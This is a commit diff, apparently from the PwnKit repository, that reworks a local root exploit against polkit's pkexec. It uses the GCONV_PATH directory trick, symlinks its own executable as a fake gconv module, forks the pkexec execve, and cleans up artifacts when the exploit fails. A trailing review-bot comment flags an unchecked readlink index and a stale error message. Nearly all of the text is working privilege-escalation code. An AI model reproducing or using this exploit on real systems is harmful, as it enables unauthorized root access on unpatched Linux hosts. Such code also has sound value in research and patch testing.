Cleaned up

Used symlinks instead of copying self over
Remove artifact folders in case the exploit didn't work
ly4k 2022-01-27 12:35:57 +01:00
parent 0b4fb44df8
commit 4bca1e6504
2 changed files with 25 additions and 70 deletions

PwnKit



@ -10,6 +10,7 @@
#include <unistd.h> #include <unistd.h>
#include <ftw.h> #include <ftw.h>
#include <sys/wait.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/types.h> #include <sys/types.h>
@ -30,69 +31,12 @@ int rmrf(char *path)
return nftw(path, unlink_cb, 64, FTW_DEPTH | FTW_PHYS); return nftw(path, unlink_cb, 64, FTW_DEPTH | FTW_PHYS);
} }
int cp(const char *from, const char *to)
{
int fd_to, fd_from;
char buf[4096];
ssize_t nread;
int saved_errno;
fd_from = open(from, O_RDONLY);
if (fd_from < 0)
return -1;
fd_to = open(to, O_WRONLY | O_CREAT | O_EXCL, 0755);
if (fd_to < 0)
goto out_error;
while (nread = read(fd_from, buf, sizeof buf), nread > 0)
{
char *out_ptr = buf;
ssize_t nwritten;
do
{
nwritten = write(fd_to, out_ptr, nread);
if (nwritten >= 0)
{
nread -= nwritten;
out_ptr += nwritten;
}
else if (errno != EINTR)
{
goto out_error;
}
} while (nread > 0);
}
if (nread == 0)
{
if (close(fd_to) < 0)
{
fd_to = -1;
goto out_error;
}
close(fd_from);
return 0;
}
out_error:
saved_errno = errno;
close(fd_from);
if (fd_to >= 0)
close(fd_to);
errno = saved_errno;
return -1;
}
void entry(void) void entry(void)
{ {
int res; int res, pid, status;
FILE *fp; FILE *fp;
ssize_t len;
char exe[PATH_MAX];
res = mkdir("GCONV_PATH=.", 0777); res = mkdir("GCONV_PATH=.", 0777);
if (res == -1 && errno != EEXIST) if (res == -1 && errno != EEXIST)
@ -118,13 +62,16 @@ void entry(void)
} }
fclose(fp); fclose(fp);
res = cp("/proc/self/exe", "pkexec/pkexec.so"); exe[readlink("/proc/self/exe", exe, sizeof(exe))] = 0;
res = symlink(exe, "pkexec/pkexec.so");
if (res == -1) if (res == -1)
{ {
perror("Failed to copy file"); perror("Failed to copy file");
_exit(1); _exit(1);
} }
if ((pid = fork()) == 0)
{
execve( execve(
"/usr/bin/pkexec", "/usr/bin/pkexec",
(char *[]){NULL}, (char *[]){NULL},
@ -139,6 +86,14 @@ void entry(void)
_exit(0); _exit(0);
} }
// Cleanup for situations where the exploit didn't work
wait(NULL);
rmrf("GCONV_PATH=.");
rmrf("pkexec");
_exit(0);
}
void gconv() {} void gconv() {}
void gconv_init() void gconv_init()
{ {
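Review bot: In the second hunk, `exe[readlink("/proc/self/exe", exe, sizeof(exe))] = 0;` indexes the buffer with an unchecked return value: readlink() returns -1 on failure and returns sizeof(exe) when the path did not fit, so both cases write one byte outside `exe`. The new `ssize_t len` declared in the first hunk is never assigned in what is visible; use it to bound the write, e.g. `len = readlink("/proc/self/exe", exe, sizeof(exe) - 1); if (len < 0) { perror("readlink"); _exit(1); } exe[len] = 0;`. On the same hunk the `perror("Failed to copy file")` message now follows a symlink() call rather than the removed cp() and no longer describes the failure; `"Failed to create symlink"` would match. In the third hunk the `wait(NULL)` and both `rmrf()` results are discarded, so a failed cleanup is silent; that is probably acceptable for best-effort cleanup but deserves a comment saying so. entry() starts and ends outside the second hunk.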